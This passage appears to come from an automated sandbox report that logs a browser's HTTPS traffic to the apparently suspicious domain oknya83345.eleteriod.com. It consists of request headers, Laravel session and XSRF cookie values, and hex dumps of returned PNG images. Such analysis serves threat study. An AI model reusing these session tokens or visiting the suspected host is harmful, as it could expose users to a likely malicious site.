                          2024-05-22 15:57:28 UTC811INData Raw: 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97 52 bd
                          Data Ascii: &w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|R
                          2024-05-22 15:57:29 UTC1369INData Raw: f5 16 3f 71 e5 73 20 f1 e7 41 ae 3a 39 f3 d8 a8 de f6 04 1e a1 98 73 71 2c ae c2 51 06 33 88 ff ba d4 4c 7d a2 98 61 50 87 0d 00 fe 4c fc f9 54 f6 ba 0d d8 a6 c5 31 d6 82 86 01 a7 90 56 2e 89 3e ae 65 ae bb 49 3f b4 49 2a a7 b1 c4 7f 9d 28 a2 8e c9 39 48 fa 3f 6b 02 e7 53 bd ef f7 a3 6b 02 30 aa 85 f1 96 24 95 cf 10 e2 ef 2b b9 6b bd ac 23 24 bd d6 65 c4 9f e7 39 eb d8 bc c3 23 a9 28 bd 54 6f f9 75 57 e0 88 35 00 f8 6a 74 88 4c 1e 03 fe 3b 3a 84 2a 61 15 e0 c7 a4 a7 70 37 2c e8 ff 58 17 38 ac a0 7f 5b 4b af 6a f7 98 65 a3 03 28 8b 0f 93 56 46 50 ff a6 00 47 02 bb 00 f7 05 67 a9 8b 57 49 0d 1c db 01 f7 c4 46 29 b5 6d 49 4b f0 4b 92 aa ef 29 e0 93 c0 26 c0 a5 c0 9c d8 38 95 31 0a f8 46 74 08 49 92 24 49 ea 26 bd c0 c0 e8 10 4d aa e2 12 f7 75 72 10 b0 59 74
                          Data Ascii: ?qs A:9sq,Q3L}aPLT1V.>eI?I*(9H?kSk0$+k#$e9#(TouW5jtL;:*ap7,X8[Kje(VFPGgWIF)mIKK)&81FtI$I&MurYt


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          53192.168.2.449798188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1120OUTGET /wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:29 UTC645INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/png
                          Content-Length: 231
                          Connection: close
                          Content-Disposition: inline; filename="wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVYONeMwp5Z%2F98ysH80aZKrrLngVYMY2YmXNRp4vC2D6cMBRPlkiI9zfaEM7%2FeDaJrS3K%2Bqx3sDZX3hrP22wQO5b%2BLn9ill4p1mRZgs3HPBIjHJ%2F33F2tsrtaQy4UA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0087ae3c0f81-EWR
                          2024-05-22 15:57:29 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          54192.168.2.449799188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1462OUTGET /qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd240 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:28 UTC665INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/png
                          Content-Length: 29796
                          Connection: close
                          Content-Disposition: inline; filename="qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd240"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YmjzICk9V5Nt0aqcF0Meu%2BXx7MbedRtQ51LvgVcIV8RzztmBAVY9gqfuoJRQ74D20YAQnU3KFcF0HO5g4No9pDH9vbzC%2BeIT2J%2FCek3v5219WlenD4eVmnFI85M7%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0087cd1242c1-EWR
                          2024-05-22 15:57:28 UTC704INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                          Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                          2024-05-22 15:57:28 UTC1369INData Raw: 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0
                          Data Ascii: 9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7Hey
                          2024-05-22 15:57:28 UTC1369INData Raw: dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03
                          Data Ascii: #&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W
                          2024-05-22 15:57:28 UTC1369INData Raw: e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82
                          Data Ascii: Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W
                          2024-05-22 15:57:28 UTC1369INData Raw: e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42
                          Data Ascii: l[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB
                          2024-05-22 15:57:29 UTC1369INData Raw: e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d
                          Data Ascii: e8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-
                          2024-05-22 15:57:29 UTC1369INData Raw: fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7
                          Data Ascii: I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?
                          2024-05-22 15:57:29 UTC1369INData Raw: 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88
                          Data Ascii: ;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}
                          2024-05-22 15:57:29 UTC1369INData Raw: 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6
                          Data Ascii: {3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b
                          2024-05-22 15:57:29 UTC1369INData Raw: f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae
                          Data Ascii: {|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          55192.168.2.449800188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1119OUTGET /qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:29 UTC638INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/png
                          Content-Length: 727
                          Connection: close
                          Content-Disposition: inline; filename="qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0riWlLhzfshACoCURx1ruDsieRa70wd696hk%2BrTMJ9YNgqVJf2881Fujm2o7ABvd029VNSwU5NAByvctGygi9ywyzWMbylUf8xsps54ibY2HRoM%2FiEdxMXauPZbRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0087fd758c72-EWR
